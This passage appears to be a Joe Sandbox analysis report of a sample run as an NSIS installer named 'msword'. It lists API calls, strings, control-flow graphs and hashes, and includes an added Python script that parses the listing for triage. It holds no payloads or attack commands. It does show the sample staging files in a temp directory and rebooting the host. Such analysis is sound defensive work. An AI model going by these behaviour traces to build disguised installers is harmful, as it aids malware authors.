                                                                            APIs
                                                                            • #17.COMCTL32 ref: 004038A2
                                                                            • SetErrorMode.KERNELBASE(00008001), ref: 004038AD
                                                                            • OleInitialize.OLE32(00000000), ref: 004038B4
                                                                              • Part of subcall function 004062FC: GetModuleHandleA.KERNEL32(?,?,00000020,004038C6,00000008), ref: 0040630A
                                                                              • Part of subcall function 004062FC: LoadLibraryA.KERNELBASE(?,?,?,00000020,004038C6,00000008), ref: 00406315
                                                                              • Part of subcall function 004062FC: GetProcAddress.KERNEL32(00000000), ref: 00406327
                                                                            • SHGetFileInfoW.SHELL32(00409264,00000000,?,000002B4,00000000), ref: 004038DC
                                                                              • Part of subcall function 00406009: lstrcpynW.KERNEL32(?,?,00002004,004038F1,0046ADC0,NSIS Error), ref: 00406016
                                                                            • GetCommandLineW.KERNEL32(0046ADC0,NSIS Error), ref: 004038F1
                                                                            • GetModuleHandleW.KERNEL32(00000000,004C30A0,00000000), ref: 00403904
                                                                            • CharNextW.USER32(00000000,004C30A0,00000020), ref: 0040392B
                                                                            • GetTempPathW.KERNEL32(00002004,004D70C8,00000000,00000020), ref: 00403A00
                                                                            • GetWindowsDirectoryW.KERNEL32(004D70C8,00001FFF), ref: 00403A15
                                                                            • lstrcatW.KERNEL32(004D70C8,\Temp), ref: 00403A21
                                                                            • DeleteFileW.KERNELBASE(004D30C0), ref: 00403A38
                                                                            • CoUninitialize.COMBASE(?), ref: 00403AD1
                                                                            • ExitProcess.KERNEL32 ref: 00403AF1
                                                                            • lstrcatW.KERNEL32(004D70C8,~nsu.tmp), ref: 00403AFD
                                                                            • lstrcmpiW.KERNEL32(004D70C8,004CF0B8,004D70C8,~nsu.tmp), ref: 00403B09
                                                                            • CreateDirectoryW.KERNEL32(004D70C8,00000000), ref: 00403B15
                                                                            • SetCurrentDirectoryW.KERNEL32(004D70C8), ref: 00403B1C
                                                                            • DeleteFileW.KERNEL32(004331E8,004331E8,?,00477008,00409204,00473000,?), ref: 00403B6D
                                                                            • CopyFileW.KERNEL32(004DF0D8,004331E8,00000001), ref: 00403B81
                                                                            • CloseHandle.KERNEL32(00000000,004331E8,004331E8,?,004331E8,00000000), ref: 00403BAE
                                                                            • GetCurrentProcess.KERNEL32(00000028,00000005,00000005,00000004,00000003), ref: 00403C04
                                                                            • ExitWindowsEx.USER32(00000002,00000000), ref: 00403C40
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000000E.00000002.1969136933.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 0000000E.00000002.1969046534.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
                                                                            • Associated: 0000000E.00000002.1969169410.0000000000408000.00000002.00000001.01000000.0000000C.sdmp
                                                                            • Associated: 0000000E.00000002.1969278177.000000000040B000.00000004.00000001.01000000.0000000C.sdmp
                                                                            • Associated: 0000000E.00000002.1969278177.000000000041F000.00000004.00000001.01000000.0000000C.sdmp
                                                                            • Associated: 0000000E.00000002.1969278177.0000000000461000.00000004.00000001.01000000.0000000C.sdmp
                                                                            • Associated: 0000000E.00000002.1969432159.00000000004F4000.00000002.00000001.01000000.0000000C.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_14_2_400000_msword.jbxd
                                                                            Similarity
                                                                            • API ID: File$DirectoryHandle$CurrentDeleteExitModuleProcessWindowslstrcat$AddressCharCloseCommandCopyCreateErrorInfoInitializeLibraryLineLoadModeNextPathProcTempUninitializelstrcmpilstrcpyn
                                                                            • String ID: /D=$ _?=$Error launching installer$NCRC$NSIS Error$SeShutdownPrivilege$\Temp$~nsu.tmp$1C
                                                                            • API String ID: 2435955865-239407132
                                                                            • Opcode ID: b4c90e19bc4a522d6528af1b5983b0f211df9e73c6af6eb8e5ff34ebe7c06cb6
                                                                            • Instruction ID: 7cf1fa831aca86d96b8495533088dbe4cf0b0326274ef0a42366eb07f7c747b9
                                                                            • Opcode Fuzzy Hash: b4c90e19bc4a522d6528af1b5983b0f211df9e73c6af6eb8e5ff34ebe7c06cb6
                                                                            • Instruction Fuzzy Hash: C4A1B671544305BAD6207F629D4AF1B3EACAF0070AF15483FF585B61D2DBBC8A448B6E
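The "APIs" and "String ID" lines of the entry function above are what an analyst actually triages from this listing: the strings /D=, _?=, NCRC, NSIS Error and ~nsu.tmp, the GetTempPathW / lstrcatW / CreateDirectoryW / SetCurrentDirectoryW / CopyFileW staging sequence, the LoadLibraryA + GetProcAddress resolver at 004062FC and the ExitWindowsEx call next to the SeShutdownPrivilege string are all consistent with the stock NSIS installer stub rather than with hand-written code. The Python below is an added example, not Joe Sandbox or NSIS code: it parses listing lines in exactly the format shown on this page (the same format used for the clipboard function earlier) into records, restores call order by sorting on the ref address, splits the "$"-joined String ID field, and applies behaviour labels and NSIS indicator strings that are this example's own assumptions. The sample input is constructed from lines copied out of the listing above.

```python
"""Parse Joe Sandbox function-listing lines ('APIs' bullets and the 'String ID'
line) into records and summarise what the function does.  Added example, not
Joe Sandbox or NSIS code; labels and NSIS indicators are assumptions."""
import re
from collections import Counter

# Constructed sample: lines copied from the installer entry-function listing
# in this report.  'ref' is the address of the call instruction.
SAMPLE_APIS = r"""
• #17.COMCTL32 ref: 004038A2
• SetErrorMode.KERNELBASE(00008001), ref: 004038AD
• OleInitialize.OLE32(00000000), ref: 004038B4
  • Part of subcall function 004062FC: GetModuleHandleA.KERNEL32(?,?,00000020,004038C6,00000008), ref: 0040630A
  • Part of subcall function 004062FC: LoadLibraryA.KERNELBASE(?,?,?,00000020,004038C6,00000008), ref: 00406315
  • Part of subcall function 004062FC: GetProcAddress.KERNEL32(00000000), ref: 00406327
  • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
• GetTempPathW.KERNEL32(00002004,004D70C8,00000000,00000020), ref: 00403A00
• GetWindowsDirectoryW.KERNEL32(004D70C8,00001FFF), ref: 00403A15
• lstrcatW.KERNEL32(004D70C8,\Temp), ref: 00403A21
• ExitProcess.KERNEL32 ref: 00403AF1
• lstrcatW.KERNEL32(004D70C8,~nsu.tmp), ref: 00403AFD
• CreateDirectoryW.KERNEL32(004D70C8,00000000), ref: 00403B15
• SetCurrentDirectoryW.KERNEL32(004D70C8), ref: 00403B1C
• CopyFileW.KERNEL32(004DF0D8,004331E8,00000001), ref: 00403B81
• ExitWindowsEx.USER32(00000002,00000000), ref: 00403C40
"""
SAMPLE_STRING_ID = (r"• String ID: /D=$ _?=$Error launching installer$NCRC$NSIS Error"
                    r"$SeShutdownPrivilege$\Temp$~nsu.tmp$1C")

# One listing line: optional 'Part of subcall function XXXXXXXX:' prefix, then
# Name.MODULE, an optional '(args)', then 'ref: ADDRESS'.  An import by ordinal
# such as '#17.COMCTL32' carries no argument list at all.
API_LINE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-F]{8}):\s*)?"
    r"(?P<name>[#\w]+)\.(?P<module>[A-Z0-9]+)"
    r"(?:\((?P<args>.*)\))?,?\s*ref:\s*(?P<ref>[0-9A-F]{8})\s*$")

def split_args(s):
    """Split at commas outside parentheses and double quotes, so string
    arguments such as RemoveDirectory("%s") survive intact."""
    out, cur, depth, quoted = [], [], 0, False
    for ch in s:
        if ch == '"':
            quoted = not quoted
        elif not quoted and ch == "(":
            depth += 1
        elif not quoted and ch == ")":
            depth -= 1
        elif not quoted and ch == "," and depth == 0:
            out.append("".join(cur))
            cur = []
            continue
        cur.append(ch)
    return out + ["".join(cur)] if (cur or out) else []

def parse_api_lines(text):
    """One record per recognised bullet; lines in another format are skipped."""
    records = []
    for line in text.splitlines():
        m = API_LINE.match(line)
        if m:
            records.append({"name": m["name"], "module": m["module"],
                            "args": split_args(m["args"] or ""),
                            "ref": int(m["ref"], 16),
                            "subcall": int(m["sub"], 16) if m["sub"] else None})
    return records

def parse_string_ids(line):
    """'String ID' joins a function's strings with '$'; a string that itself
    contains '$' (an NSIS variable name, say) cannot be recovered unambiguously."""
    m = re.search(r"String ID:\s*(.*)$", line)
    return m.group(1).split("$") if m else []

# Assumption: informal labels for this example, not Joe Sandbox signature names.
BEHAVIOURS = {
    "resolves imports at runtime": {"LoadLibraryA", "GetProcAddress"},
    "stages files under a temp directory":
        {"GetTempPathW", "CreateDirectoryW", "SetCurrentDirectoryW", "CopyFileW"},
    "can reboot the host": {"ExitWindowsEx"},
    "copies text to the clipboard": {"OpenClipboard", "SetClipboardData"},
}
# Assumption: strings carried by the stock NSIS installer stub.
NSIS_INDICATORS = {"NSIS Error", "~nsu.tmp", "NCRC", "Error launching installer"}

def summarise(api_text, string_id_line=""):
    """Aggregate a listing into the facts worth keeping in a triage note."""
    recs = parse_api_lines(api_text)
    names = {r["name"] for r in recs}
    strings = parse_string_ids(string_id_line)
    direct = sorted((r for r in recs if r["subcall"] is None), key=lambda r: r["ref"])
    return {
        "calls": len(recs),
        "by_module": Counter(r["module"] for r in recs),
        # The report does not list calls in address order; sorting on ref restores it.
        "direct_in_address_order": [r["name"] for r in direct],
        "behaviours": sorted(b for b, apis in BEHAVIOURS.items() if apis <= names),
        # Literal pieces appended with lstrcatW, e.g. '\Temp' and '~nsu.tmp'.
        "appended_path_parts": sorted(r["args"][1] for r in recs
                                      if r["name"] == "lstrcatW" and len(r["args"]) > 1),
        "nsis_stub": bool(NSIS_INDICATORS & set(strings)),
    }
```

Run summarise(SAMPLE_APIS, SAMPLE_STRING_ID) to get the per-module counts, the address-ordered call sequence and the NSIS verdict for this function. Two caveats: the "Part of subcall function" bullets belong to callees (here the import resolver at 004062FC and the formatter at 004062A3), so keep them separate from the function's own calls when you describe its behaviour, and the "$" separator in String ID is ambiguous for any string that contains "$", so treat that split as a heuristic.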

                                                                            Control-flow Graph

                                                                            control_flow_graph 820 4074bb-4074c0 821 4074c2-4074ef 820->821 822 40752f-407547 820->822 824 4074f1-4074f4 821->824 825 4074f6-4074fa 821->825 823 407aeb-407aff 822->823 829 407b01-407b17 823->829 830 407b19-407b2c 823->830 826 407506-407509 824->826 827 407502 825->827 828 4074fc-407500 825->828 831 407527-40752a 826->831 832 40750b-407514 826->832 827->826 828->826 833 407b33-407b3a 829->833 830->833 836 4076f6-407713 831->836 837 407516 832->837 838 407519-407525 832->838 834 407b61-407c68 833->834 835 407b3c-407b40 833->835 851 407350 834->851 852 407cec 834->852 840 407b46-407b5e 835->840 841 407ccd-407cd4 835->841 843 407715-407729 836->843 844 40772b-40773e 836->844 837->838 839 407589-4075b6 838->839 847 4075d2-4075ec 839->847 848 4075b8-4075d0 839->848 840->834 845 407cdd-407cea 841->845 849 407741-40774b 843->849 844->849 850 407cef-407cf6 845->850 853 4075f0-4075fa 847->853 848->853 854 40774d 849->854 855 4076ee-4076f4 849->855 856 407357-40735b 851->856 857 40749b-4074b6 851->857 858 40746d-407471 851->858 859 4073ff-407403 851->859 852->850 862 407600 853->862 863 407571-407577 853->863 864 407845-4078a1 854->864 865 4076c9-4076cd 854->865 855->836 861 407692-40769c 855->861 856->845 866 407361-40736e 856->866 857->823 871 407c76-407c7d 858->871 872 407477-40748b 858->872 877 407409-407420 859->877 878 407c6d-407c74 859->878 867 4076a2-4076c4 861->867 868 407c9a-407ca1 861->868 880 407556-40756e 862->880 881 407c7f-407c86 862->881 869 40762a-407630 863->869 870 40757d-407583 863->870 864->823 873 407c91-407c98 865->873 874 4076d3-4076eb 865->874 866->852 882 407374-4073ba 866->882 867->864 868->845 883 40768e 869->883 884 407632-40764f 869->884 870->839 870->883 871->845 879 40748e-407496 872->879 873->845 874->855 885 407423-407427 877->885 878->845 879->858 889 407498 879->889 880->863 881->845 887 4073e2-4073e4 882->887 888 4073bc-4073c0 882->888 883->861 890 
407651-407665 884->890 891 407667-40767a 884->891 885->859 886 407429-40742f 885->886 893 407431-407438 886->893 894 407459-40746b 886->894 897 4073f5-4073fd 887->897 898 4073e6-4073f3 887->898 895 4073c2-4073c5 GlobalFree 888->895 896 4073cb-4073d9 GlobalAlloc 888->896 889->857 892 40767d-407687 890->892 891->892 892->869 899 407689 892->899 900 407443-407453 GlobalAlloc 893->900 901 40743a-40743d GlobalFree 893->901 894->879 895->896 896->852 902 4073df 896->902 897->885 898->897 898->898 904 407c88-407c8f 899->904 905 40760f-407627 899->905 900->852 900->894 901->900 902->887 904->845 905->869
                                                                            Memory Dump Source
                                                                            • Source File: 0000000E.00000002.1969136933.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 0000000E.00000002.1969046534.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
                                                                            • Associated: 0000000E.00000002.1969169410.0000000000408000.00000002.00000001.01000000.0000000C.sdmp
                                                                            • Associated: 0000000E.00000002.1969278177.000000000040B000.00000004.00000001.01000000.0000000C.sdmp
                                                                            • Associated: 0000000E.00000002.1969278177.000000000041F000.00000004.00000001.01000000.0000000C.sdmp
                                                                            • Associated: 0000000E.00000002.1969278177.0000000000461000.00000004.00000001.01000000.0000000C.sdmp
                                                                            • Associated: 0000000E.00000002.1969432159.00000000004F4000.00000002.00000001.01000000.0000000C.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_14_2_400000_msword.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 40903ab5852a4d5be4c36b37cb9ac035c10bc9e934730a02f9966fb4d26bd2b9
                                                                            • Instruction ID: b44593247c4c050b0e646bb53675e7b1a8962b0b92449cff70e8ee1879f4dc4f
                                                                            • Opcode Fuzzy Hash: 40903ab5852a4d5be4c36b37cb9ac035c10bc9e934730a02f9966fb4d26bd2b9
                                                                            • Instruction Fuzzy Hash: 00F14871908249DBDF18CF28C8946E93BB1FF44345F14852AFD5A9B281D338E986DF86
                                                                            APIs
                                                                            • GetModuleHandleA.KERNEL32(?,?,00000020,004038C6,00000008), ref: 0040630A
                                                                            • LoadLibraryA.KERNELBASE(?,?,?,00000020,004038C6,00000008), ref: 00406315
                                                                            • GetProcAddress.KERNEL32(00000000), ref: 00406327
                                                                            Memory Dump Source
                                                                            • Source File: 0000000E.00000002.1969136933.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 0000000E.00000002.1969046534.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
                                                                            • Associated: 0000000E.00000002.1969169410.0000000000408000.00000002.00000001.01000000.0000000C.sdmp
                                                                            • Associated: 0000000E.00000002.1969278177.000000000040B000.00000004.00000001.01000000.0000000C.sdmp
                                                                            • Associated: 0000000E.00000002.1969278177.000000000041F000.00000004.00000001.01000000.0000000C.sdmp
                                                                            • Associated: 0000000E.00000002.1969278177.0000000000461000.00000004.00000001.01000000.0000000C.sdmp
                                                                            • Associated: 0000000E.00000002.1969432159.00000000004F4000.00000002.00000001.01000000.0000000C.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_14_2_400000_msword.jbxd
                                                                            Similarity
                                                                            • API ID: AddressHandleLibraryLoadModuleProc
                                                                            • String ID:
                                                                            • API String ID: 310444273-0
                                                                            • Opcode ID: a32725a6e723fbcd4130456278775f3bec070c67c36dcd31cef0056e0dec9b78
                                                                            • Instruction ID: 23f85fcbdf3119ad7ff9d94b99dcad510d7c567b01d836bd9cab37df641e0753
                                                                            • Opcode Fuzzy Hash: a32725a6e723fbcd4130456278775f3bec070c67c36dcd31cef0056e0dec9b78
                                                                            • Instruction Fuzzy Hash: 53D0123120010597C6001B65AE0895F776CEF95611707803EF542F3132EB34D415AAEC
                                                                            APIs
                                                                            • FindFirstFileW.KERNELBASE(004572C0,0045BEC8,004572C0,004067CE,004572C0), ref: 004062E0
                                                                            • FindClose.KERNEL32(00000000), ref: 004062EC
                                                                            Memory Dump Source
                                                                            • Source File: 0000000E.00000002.1969136933.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 0000000E.00000002.1969046534.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
                                                                            • Associated: 0000000E.00000002.1969169410.0000000000408000.00000002.00000001.01000000.0000000C.sdmp
                                                                            • Associated: 0000000E.00000002.1969278177.000000000040B000.00000004.00000001.01000000.0000000C.sdmp
                                                                            • Associated: 0000000E.00000002.1969278177.000000000041F000.00000004.00000001.01000000.0000000C.sdmp
                                                                            • Associated: 0000000E.00000002.1969278177.0000000000461000.00000004.00000001.01000000.0000000C.sdmp
                                                                            • Associated: 0000000E.00000002.1969432159.00000000004F4000.00000002.00000001.01000000.0000000C.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_14_2_400000_msword.jbxd
                                                                            Similarity
                                                                            • API ID: Find$CloseFileFirst
                                                                            • String ID:
                                                                            • API String ID: 2295610775-0
                                                                            • Opcode ID: c6f116a51c08f79c55c0589ec24d04b7eaebe21ecc1702d782a9edd0eda53026
                                                                            • Instruction ID: 3dd5e1b78c12f0f437ff376ab6b0e1f90f8becb0d3509d6a9a7f52ed6ae53baf
                                                                            • Opcode Fuzzy Hash: c6f116a51c08f79c55c0589ec24d04b7eaebe21ecc1702d782a9edd0eda53026
                                                                            • Instruction Fuzzy Hash: 7AD0C9315041205BC25127386E0889B6A589F163723258A7AB5A6E11E0CB388C2296A8

                                                                            Control-flow Graph (rendered graph not reproduced in this text export)
                                                                            APIs
                                                                            • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 004054B5
                                                                            • ShowWindow.USER32(?), ref: 004054D2
                                                                            • DestroyWindow.USER32 ref: 004054E6
                                                                            • SetWindowLongW.USER32(?,00000000,00000000), ref: 00405502
                                                                            • GetDlgItem.USER32(?,?), ref: 00405523
                                                                            • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00405537
                                                                            • IsWindowEnabled.USER32(00000000), ref: 0040553E
                                                                            • GetDlgItem.USER32(?,00000001), ref: 004055ED
                                                                            • GetDlgItem.USER32(?,00000002), ref: 004055F7
                                                                            • SetClassLongW.USER32(?,000000F2,?), ref: 00405611
                                                                            • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 00405662
                                                                            • GetDlgItem.USER32(?,00000003), ref: 00405708
                                                                            • ShowWindow.USER32(00000000,?), ref: 0040572A
                                                                            • KiUserCallbackDispatcher.NTDLL(?,?), ref: 0040573C
                                                                            • EnableWindow.USER32(?,?), ref: 00405757
                                                                            • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 0040576D
                                                                            • EnableMenuItem.USER32(00000000), ref: 00405774
                                                                            • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 0040578C
                                                                            • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 0040579F
                                                                            • lstrlenW.KERNEL32(00447240,?,00447240,0046ADC0), ref: 004057C8
                                                                            • SetWindowTextW.USER32(?,00447240), ref: 004057DC
                                                                            • ShowWindow.USER32(?,0000000A), ref: 00405910
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000000E.00000002.1969136933.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 0000000E.00000002.1969046534.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
                                                                            • Associated: 0000000E.00000002.1969169410.0000000000408000.00000002.00000001.01000000.0000000C.sdmp
                                                                            • Associated: 0000000E.00000002.1969278177.000000000040B000.00000004.00000001.01000000.0000000C.sdmp
                                                                            • Associated: 0000000E.00000002.1969278177.000000000041F000.00000004.00000001.01000000.0000000C.sdmp
                                                                            • Associated: 0000000E.00000002.1969278177.0000000000461000.00000004.00000001.01000000.0000000C.sdmp
                                                                            • Associated: 0000000E.00000002.1969432159.00000000004F4000.00000002.00000001.01000000.0000000C.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_14_2_400000_msword.jbxd
                                                                            Similarity
                                                                            • API ID: Window$Item$MessageSend$Show$EnableLongMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
                                                                            • String ID: @rD
                                                                            • API String ID: 3282139019-3814967855
                                                                            • Opcode ID: 892c705fd8619986465a6960d4e81f7d1e8168c1c52714a2b5abc7a1d7472251
                                                                            • Instruction ID: 0f9b988f21b44e482dc064b3562f20aa73efc2902ac8c6ffeb9ddf27563d0ddb
                                                                            • Opcode Fuzzy Hash: 892c705fd8619986465a6960d4e81f7d1e8168c1c52714a2b5abc7a1d7472251
                                                                            • Instruction Fuzzy Hash: D8C1C371500A04EBDB216F61EE49E2B3BA9EB45345F00093EF551B12F0DB799891EF2E

                                                                            Control-flow Graph (rendered graph not reproduced in this text export)
                                                                            APIs
                                                                            • PostQuitMessage.USER32(00000000), ref: 00401648
                                                                            • Sleep.KERNELBASE(00000000,?,00000000,00000000,00000000), ref: 004016B2
                                                                            • SetForegroundWindow.USER32(?), ref: 004016CB
                                                                            • ShowWindow.USER32(?), ref: 00401753
                                                                            • ShowWindow.USER32(?), ref: 00401767
                                                                            • SetFileAttributesW.KERNEL32(00000000,00000000,?,000000F0), ref: 0040178C
                                                                            • CreateDirectoryW.KERNELBASE(?,00000000,00000000,0000005C,?,?,?,000000F0,?,000000F0), ref: 004017F4
                                                                            • GetLastError.KERNEL32(?,?,000000F0,?,000000F0), ref: 004017FE
                                                                            • GetLastError.KERNEL32(?,?,000000F0,?,000000F0), ref: 0040180B
                                                                            • GetFileAttributesW.KERNELBASE(?,?,?,000000F0,?,000000F0), ref: 0040182A
                                                                            • SetCurrentDirectoryW.KERNELBASE(?,004CB0B0,?,000000E6,0040F0D0,?,?,?,000000F0,?,000000F0), ref: 00401885
                                                                            • MoveFileW.KERNEL32(00000000,?), ref: 00401908
                                                                            • GetFullPathNameW.KERNEL32(00000000,00002004,00000000,?,00000000,000000E3,0040F0D0,?,00000000,00000000,?,?,?,?,?,000000F0), ref: 00401975
                                                                            • GetShortPathNameW.KERNEL32(00000000,00000000,00002004), ref: 004019BF
                                                                            • SearchPathW.KERNELBASE(00000000,00000000,00000000,00002004,00000000,?,000000FF,?,00000000,00000000,?,?,?,?,?,000000F0), ref: 004019DE
                                                                            Strings
                                                                            • Rename on reboot: %s, xrefs: 00401943
                                                                            • Rename: %s, xrefs: 004018F8
                                                                            • Sleep(%d), xrefs: 0040169D
                                                                            • detailprint: %s, xrefs: 00401679
                                                                            • CreateDirectory: "%s" (%d), xrefs: 004017BF
                                                                            • IfFileExists: file "%s" exists, jumping %d, xrefs: 004018AD
                                                                            • CreateDirectory: can't create "%s" (err=%d), xrefs: 00401815
                                                                            • SetFileAttributes: "%s":%08X, xrefs: 0040177B
                                                                            • CreateDirectory: can't create "%s" - a file already exists, xrefs: 00401837
                                                                            • IfFileExists: file "%s" does not exist, jumping %d, xrefs: 004018C6
                                                                            • BringToFront, xrefs: 004016BD
                                                                            • Call: %d, xrefs: 0040165A
                                                                            • SetFileAttributes failed., xrefs: 004017A1
                                                                            • Rename failed: %s, xrefs: 0040194B
                                                                            • Aborting: "%s", xrefs: 0040161D
                                                                            • CreateDirectory: "%s" created, xrefs: 00401849
                                                                            • Jump: %d, xrefs: 00401602
                                                                            Memory Dump Source
                                                                            • Source File: 0000000E.00000002.1969136933.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 0000000E.00000002.1969046534.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
                                                                            • Associated: 0000000E.00000002.1969169410.0000000000408000.00000002.00000001.01000000.0000000C.sdmp
                                                                            • Associated: 0000000E.00000002.1969278177.000000000040B000.00000004.00000001.01000000.0000000C.sdmp
                                                                            • Associated: 0000000E.00000002.1969278177.000000000041F000.00000004.00000001.01000000.0000000C.sdmp
                                                                            • Associated: 0000000E.00000002.1969278177.0000000000461000.00000004.00000001.01000000.0000000C.sdmp
                                                                            • Associated: 0000000E.00000002.1969432159.00000000004F4000.00000002.00000001.01000000.0000000C.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_14_2_400000_msword.jbxd
                                                                            Similarity
                                                                            • API ID: FilePathWindow$AttributesDirectoryErrorLastNameShow$CreateCurrentForegroundFullMessageMovePostQuitSearchShortSleep
                                                                            • String ID: Aborting: "%s"$BringToFront$Call: %d$CreateDirectory: "%s" (%d)$CreateDirectory: "%s" created$CreateDirectory: can't create "%s" (err=%d)$CreateDirectory: can't create "%s" - a file already exists$IfFileExists: file "%s" does not exist, jumping %d$IfFileExists: file "%s" exists, jumping %d$Jump: %d$Rename failed: %s$Rename on reboot: %s$Rename: %s$SetFileAttributes failed.$SetFileAttributes: "%s":%08X$Sleep(%d)$detailprint: %s
                                                                            • API String ID: 2872004960-3619442763
                                                                            • Opcode ID: e7226c198396c3fe3a7f3bea8c4d52a2e846d2bb9e79691e18455936b93e1c7d
                                                                            • Instruction ID: b6b48939bc8a7188504c618ab7841b31fdd5898bf24c808f75461ec369738802
                                                                            • Opcode Fuzzy Hash: e7226c198396c3fe3a7f3bea8c4d52a2e846d2bb9e79691e18455936b93e1c7d
                                                                            • Instruction Fuzzy Hash: 0AB1F471A00204ABDB10BF61DD46DAE3B69EF44314B21817FF946B21E1DA7D4E40CAAE

                                                                            Control-flow Graph (rendered graph not reproduced in this text export)
                                                                            APIs
                                                                              • Part of subcall function 004062FC: GetModuleHandleA.KERNEL32(?,?,00000020,004038C6,00000008), ref: 0040630A
                                                                              • Part of subcall function 004062FC: LoadLibraryA.KERNELBASE(?,?,?,00000020,004038C6,00000008), ref: 00406315
                                                                              • Part of subcall function 004062FC: GetProcAddress.KERNEL32(00000000), ref: 00406327
                                                                            • lstrcatW.KERNEL32(004D30C0,00447240,80000001,Control Panel\Desktop\ResourceLocale,00000000,00447240,00000000,00000006,004C30A0,-00000002,00000000,004D70C8,00403AC1,?), ref: 004059AE
                                                                            • lstrlenW.KERNEL32(00462540,?,?,?,00462540,00000000,004C70A8,004D30C0,00447240,80000001,Control Panel\Desktop\ResourceLocale,00000000,00447240,00000000,00000006,004C30A0), ref: 00405A30
                                                                            • lstrcmpiW.KERNEL32(00462538,.exe,00462540,?,?,?,00462540,00000000,004C70A8,004D30C0,00447240,80000001,Control Panel\Desktop\ResourceLocale,00000000,00447240,00000000), ref: 00405A43
                                                                            • GetFileAttributesW.KERNEL32(00462540), ref: 00405A4E
                                                                              • Part of subcall function 00405F51: wsprintfW.USER32 ref: 00405F5E
                                                                            • LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,004C70A8), ref: 00405AB7
                                                                            • RegisterClassW.USER32(0046AD60), ref: 00405B0A
                                                                            • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00405B22
                                                                            • CreateWindowExW.USER32(00000080,?,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00405B5B
                                                                              • Part of subcall function 00403E95: SetWindowTextW.USER32(00000000,0046ADC0), ref: 00403F30
                                                                            • ShowWindow.USER32(00000005,00000000), ref: 00405B91
                                                                            • LoadLibraryW.KERNELBASE(RichEd20), ref: 00405BA2
                                                                            • LoadLibraryW.KERNEL32(RichEd32), ref: 00405BAD
                                                                            • GetClassInfoW.USER32(00000000,RichEdit20A,0046AD60), ref: 00405BBD
                                                                            • GetClassInfoW.USER32(00000000,RichEdit,0046AD60), ref: 00405BCA
                                                                            • RegisterClassW.USER32(0046AD60), ref: 00405BD3
                                                                            • DialogBoxParamW.USER32(?,00000000,00405479,00000000), ref: 00405BF2
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000000E.00000002.1969136933.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 0000000E.00000002.1969046534.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
                                                                            • Associated: 0000000E.00000002.1969169410.0000000000408000.00000002.00000001.01000000.0000000C.sdmp
                                                                            • Associated: 0000000E.00000002.1969278177.000000000040B000.00000004.00000001.01000000.0000000C.sdmp
                                                                            • Associated: 0000000E.00000002.1969278177.000000000041F000.00000004.00000001.01000000.0000000C.sdmp
                                                                            • Associated: 0000000E.00000002.1969278177.0000000000461000.00000004.00000001.01000000.0000000C.sdmp
                                                                            • Associated: 0000000E.00000002.1969432159.00000000004F4000.00000002.00000001.01000000.0000000C.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_14_2_400000_msword.jbxd
                                                                            Similarity
                                                                            • API ID: ClassLoad$InfoLibraryWindow$Register$AddressAttributesCreateDialogFileHandleImageModuleParamParametersProcShowSystemTextlstrcatlstrcmpilstrlenwsprintf
                                                                            • String ID: .DEFAULT\Control Panel\International$.exe$@%F$@rD$B%F$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20A$_Nb
                                                                            • API String ID: 608394941-1650083594
                                                                            • Opcode ID: 18be7924d3bcca259bbbf180237d25193f30e5c9112311b2c349bb590eb249de
                                                                            • Instruction ID: 271ce27004ef92612bfc9362a6cc74883a37054a4c8cca7c49d128c059fded9a
                                                                            • Opcode Fuzzy Hash: 18be7924d3bcca259bbbf180237d25193f30e5c9112311b2c349bb590eb249de
                                                                            • Instruction Fuzzy Hash: 5E71A370604B04AED721AB65EE85F2736ACEB44749F00053FF945B22E2D7B89D418F6E

                                                                            Control-flow Graph

                                                                            APIs
                                                                              • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
